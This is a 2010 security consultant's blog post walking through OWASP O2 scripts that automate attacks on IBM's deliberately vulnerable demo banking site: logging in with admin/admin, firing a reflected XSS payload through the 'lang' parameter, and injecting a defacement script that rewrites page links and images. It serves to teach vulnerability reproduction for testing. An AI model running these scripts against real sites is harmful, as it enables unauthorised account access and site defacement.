parsonsisconsulting

Parsons Software Security Consulting Blog

The power of 02 scripting

with one comment

Dinis Cruz is the creator of 02.   He was kind enough to give me a lesson on 02 Internet Explorer Automated Scripting.   This is a really powerful tool and will be what I think in the future end deliverable of software security testers to there clients’.  This tool actually recreates the vulnerability step by step in an automated fashion.

Let’s get started in creating your automated XSS script for IBM’s demo test fire application.   In a previous post we showed the vulnerable lang variable to XSS and we manually exploited it with both IBM app scan as well as 02′s XSS creator.

Try 02.

First you are going to need to install 02.  02 is free and open source and is also an OWASP project.

Once you download the tool you are going to need to sync up the scripts.

Click on Custom 02 scripts.

Dinis created an 02 script for my engagement and my business Parsons Software Security Consulting, LLC.   We will drag and drop the Matt parsons v0.1 (Custom 02.h2 script to the logo.

This is the user interface to 02.

We are going to want to double click on IE Automation.   Dinis told me that this part of 02 received a lot of traction at OWASP Brazil and that they were really excited about it.

Below are the default scripts.

The default page is http://www.google.com.

Below is the sample script.


var ie = panel.<strong>add_IE</strong>().<strong>silent</strong>(<strong>true</strong>);

ie.<strong>open</strong>("http://www.google.com");

//O2File:WatiN_IE_ExtensionMethods.cs

//using O2.XRules.Database.Utils.O2

//O2Ref:WatiN.Core.1x.dll

Its basically scripted in C#.

Here is the first script Dinis created.

var ie = panel.add_IE().silent(true);

ie.open("<a href="http://demo.testfire.net/">http://demo.testfire.net</a>");

if (ie.hasLink("Sign In"))

{

ie.link("Sign In").click();

ie.field("uid").value("admin");

ie.field("passw").value("admin");

ie.button("Login").click();

}

else

ie.link("MY ACCOUNT").click();

return ie.fields();
]

This script opens the IBM demo web site and logs you in as an admin.   One of the users in the IBM test website is admin.

This welcomes you as an admin user.

Next we are going to launch a XSS attack on the lang variable that we found vulnerable in our web site scanner.


ie.open("<a href="http://demo.testfire.net/">http://demo.testfire.net</a>");

if (ie.hasLink("Sign In"))

{

ie.link("Sign In").click();

ie.field("uid").value("admin");

ie.field("passw").value("admin");

ie.button("Login").click();

}

else

ie.link("MY ACCOUNT").click();

ie.link("Customize Site Language").click();

ie.link("International").click();

var currentUrl = ie.url();

var xssPayload = "aaa&gt;&lt;script&gt; alert('xss')&lt;/script&gt;";

ie.open(currentUrl + xssPayload);

return currentUrl;]

See the alert XSS.

Now with this script we are going to do some serious XSS defacement.


panel.clear();

var ie = panel.add_IE().silent(true);

ie.open("<a href="http://demo.testfire.net/bank/customize.aspx?lang=international">http://demo.testfire.net/bank/customize.aspx?lang</a><a href="http://demo.testfire.net/bank/customize.aspx?lang=international">=international</a>");

var target = ie.elements("P").str("Curent Language: international ");

target.flash();

target.injectHtml("beforeBegin","&lt;h1&gt;O2 Platform Demos&lt;/h1&gt;"+

"The best way to learn about the security vulnerabilities of this website is to use the &lt;a href<a href="http://primarypad.com/ep/search?query=%5C">=\</a>"<a href="http://o2platform%5c/">http://o2platform\</a>"&gt;OWASP O2 Platform&lt;/a&gt;"+

"&lt;script DEFER&gt;    "+

"    //alert(document.links[0].href);"+

"    document.links[0].href = \"<a href="http://o2platform.com%5c/">http://o2platform.com\</a>";"+

"    document.images[0].src <a href="http://primarypad.com/ep/search?query=%5C">=\</a>"<a href="http://o2platform.com/images/a/">http://o2platform.com/images/a/</a>"+"a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";"+

"    //alert(document.images[0].sec);"+

"    //document.images[1].href = "+

"    //alert(document.images[1].href);"+

"&lt;/script&gt;");

//O2File:WatiN_IE_ExtensionMethods.cs

//using O2.XRules.Database.Utils.O2

//O2Ref:WatiN.Core.1x.dll]

Now remember that all of this is automated.  It goes through each of the steps to create the defacement.

If you have any questions e-mail me at mparsons1980@gmail.com

Matt Parsons, CISSP, MSM

Written by mparsons1980

November 24, 2010 at 2:00 am

Posted in Uncategorized

One Response

Subscribe to comments with RSS.

  1. I couldn’t reproduce this payload here, I think it’s because the quotes inside the href so I simplified to:

    target.injectHtml(“beforeBegin”,”O2 Platform Demos”
    “The best way to learn about the security vulnerabilities of this website is to use the ”
    OWASP O2 Platform“);

    Thiago

    December 2, 2010 at 2:36 pm


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 244 other followers

%d bloggers like this: